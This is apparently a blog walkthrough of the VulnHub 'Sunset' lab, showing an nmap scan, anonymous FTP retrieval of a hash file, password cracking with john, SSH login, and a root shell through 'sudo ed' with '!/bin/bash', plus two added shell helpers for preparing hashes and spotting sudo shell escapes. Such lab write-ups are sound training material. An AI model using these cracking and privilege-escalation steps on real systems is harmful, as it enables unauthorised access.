Tuesday, November 19, 2019

VulnHub: Sunset Walkthrough

We first start off with an nmap scan of the remote host.

root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.104

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-19 11:47 MST
Nmap scan report for 192.168.56.104
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.104:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
|   256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_  256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (EdDSA)
MAC Address: 08:00:27:13:81:5A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.27 seconds
root@ubuntu:~/src# 

Nmap shows two open ports: 21 (FTP, and the ftp-anon script reports that anonymous login is allowed) and 22 (SSH). Let's connect to the FTP server first and see what we can find there.

root@ubuntu:~# ftp 192.168.56.104
Connected to 192.168.56.104.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.104:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
226 Transfer complete.
ftp> 

There is one file we can download, 'backup'. After fetching it (ftp's `get backup`) we cat its contents.

root@ubuntu:~/src# cat backup
CREDENTIALS:
office$6$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCravWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter$6$3QWJ4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky$6$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
root@ubuntu:~/src# 

These look like user names and SHA-512 crypt(3) password hashes (the `$6$` prefix), so let's fire up john and start cracking.

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/sunset-hash.txt --format=sha512crypt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
space            (space)
cheer14          (sunset)
2g 0:00:00:13 DONE (2019-11-19 11:58) 0.1484g/s 1064p/s 1862c/s 1862C/s gerber..chanda
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#
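
Note that john reports only two loaded hashes, not five. Of the lines in backup, only the sunset and space entries are in the `user:$6$salt$hash` layout that crypt(3) SHA-512 uses (space simply has an empty salt, which is still valid); the office, datacenter and sky lines lack both the user separator and the salt delimiter, so john cannot parse them as-is. The following shell helper is an added example, not part of the original walkthrough: it filters a dumped credential file down to the lines john's sha512crypt format will load and reports the rest on stderr. The regular expression and the sample input (copied from the backup file shown above) are the only assumptions.

```shell
#!/bin/sh
# Added example: keep only the lines of a leaked credential dump that john's
# sha512crypt format can load, i.e. "user:$6$[rounds=N$]salt$hash" with a
# salt of 0-16 characters and an 86-character hash, both from [./0-9A-Za-z].
# Lines without the "user:" separator or the salt delimiter (office,
# datacenter and sky in backup) are dropped and reported on stderr.

# The five entries from the backup file above; only sunset and space are well-formed.
BACKUP_SAMPLE='CREDENTIALS:
office$6$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCravWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter$6$3QWJ4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky$6$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/'

# crypt(3) SHA-512 layout: user, colon, $6$, optional rounds=N$, salt, $, hash.
SHA512CRYPT_RE='^[^:]+:\$6\$(rounds=[0-9]+\$)?[./0-9A-Za-z]{0,16}\$[./0-9A-Za-z]{86}$'

# john_ready: read a dump on stdin, print well-formed user:hash lines on stdout
# and a one-line notice for every rejected entry on stderr.
john_ready() {
    while IFS= read -r line; do
        # Trim the trailing whitespace a copied dump often carries.
        line=$(printf '%s' "$line" | sed -E 's/[[:space:]]+$//')
        [ -n "$line" ] || continue
        if printf '%s\n' "$line" | grep -Eq "$SHA512CRYPT_RE"; then
            printf '%s\n' "$line"
        else
            printf 'skipping malformed entry: %.20s...\n' "$line" >&2
        fi
    done
}

# count_john_ready: how many of the sample lines john would actually load.
count_john_ready() {
    printf '%s\n' "$BACKUP_SAMPLE" | john_ready 2>/dev/null | wc -l | tr -d ' '
}

# Usage: write the loadable lines to a file and feed that to john.
printf '%s\n' "$BACKUP_SAMPLE" | john_ready > sunset-hash.txt
echo "hashes john can load: $(count_john_ready)"
```

The output file can be passed straight to `john --format=sha512crypt`; john also accepts the `user:hash` form without `--format`, but being explicit avoids a mis-detection when a dump mixes hash types.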

John cracked two of the hashes: space with the password 'space' and sunset with the password 'cheer14'. Our next step is to try these credentials over SSH.

root@ubuntu:~/src# ssh sunset@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:n9ATwmONo6fCyPblqlvcO7WcIWZJMqBaqDdo/jYnLPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
sunset@192.168.56.104's password: 
Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.182
sunset@sunset:~$ 

We have a successful login as 'sunset' with the password 'cheer14'. Let's check the user's sudo rights next.

sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
sunset@sunset:~$ 

We can run the ed editor as root without a password. Like many classic Unix editors, ed has a shell escape: a command line beginning with `!` is handed to sh(1), and because ed itself is running as root under sudo, so is anything it spawns. Entering `!/bin/bash` inside the editor therefore drops us into a root shell.

sunset@sunset:~$ sudo /usr/bin/ed

! /bin/bash
root@sunset:/home/sunset# id
uid=0(root) gid=0(root) groups=0(root)
root@sunset:/home/sunset# whoami
root
root@sunset:/home/sunset#
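
The `sudo -l` entry above is the whole vulnerability: any editor or pager with a `!` shell escape, granted as root, is a root shell. As an added example (not part of the original walkthrough), the shell helper below triages `sudo -l` output for exactly that pattern. The list of escape-capable binaries is a short hand-picked one of my own and not exhaustive; the sample input is the page's own `sudo -l` output plus one constructed extra entry to show that comma-separated command lists and plain (password-required) entries are handled too.

```shell
#!/bin/sh
# Added example: flag `sudo -l` entries that hand out a root shell through an
# editor's or pager's "!" shell escape. In a `sudo ed` session the line
# "!/bin/bash" spawns bash as root, which is how Sunset was rooted above.

# Hand-picked list of binaries with a well-known "!" or ":!" shell escape
# (assumption: partial; GTFOBins documents many more).
ESCAPE_BINS='ed vi vim view nano pico less more man'

# Page's own sudo -l output, plus a constructed second entry for illustration.
SUDO_L_SAMPLE='Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
    (root) /usr/bin/systemctl status ssh, /usr/bin/less /var/log/auth.log'

# sudo_escape_candidates: read `sudo -l` output on stdin, print every granted
# command whose basename is in ESCAPE_BINS, one per line.
sudo_escape_candidates() {
    # Keep only command entries: indented lines that start with "(runas)".
    grep -E '^[[:space:]]*\(' |
    # Drop the "(user : group)" prefix and any leading TAG: qualifiers
    # such as NOPASSWD: or SETENV:.
    sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*//; s/^([A-Z]+:[[:space:]]*)+//' |
    # One entry may list several commands separated by commas.
    tr ',' '\n' |
    while IFS= read -r cmd; do
        # Strip leading blanks and any arguments; keep the program path only.
        cmd=$(printf '%s' "$cmd" | sed -E 's/^[[:space:]]+//; s/[[:space:]].*$//')
        [ -n "$cmd" ] || continue
        base=${cmd##*/}
        for b in $ESCAPE_BINS; do
            if [ "$base" = "$b" ]; then
                printf '%s\n' "$cmd"
                break
            fi
        done
    done
}

# Usage: on a live host replace the sample with `sudo -l | sudo_escape_candidates`.
printf '%s\n' "$SUDO_L_SAMPLE" | sudo_escape_candidates
```

Every path this prints is a candidate for the same `!/bin/bash` breakout used on Sunset (for vi and vim the escape is `:!/bin/bash`, for less and man it is `!/bin/bash` at the pager prompt). Whether an entry requires a password matters less than it looks: sudo caches the user's own password for a few minutes, so a compromised account with a known password is rooted either way.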

We have broken out into a root shell; all that's left is to read the flag in /root.

root@sunset:/home/sunset# cd /root
root@sunset:~# ls
flag.txt  ftp  server.sh
root@sunset:~# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
root@sunset:~# 
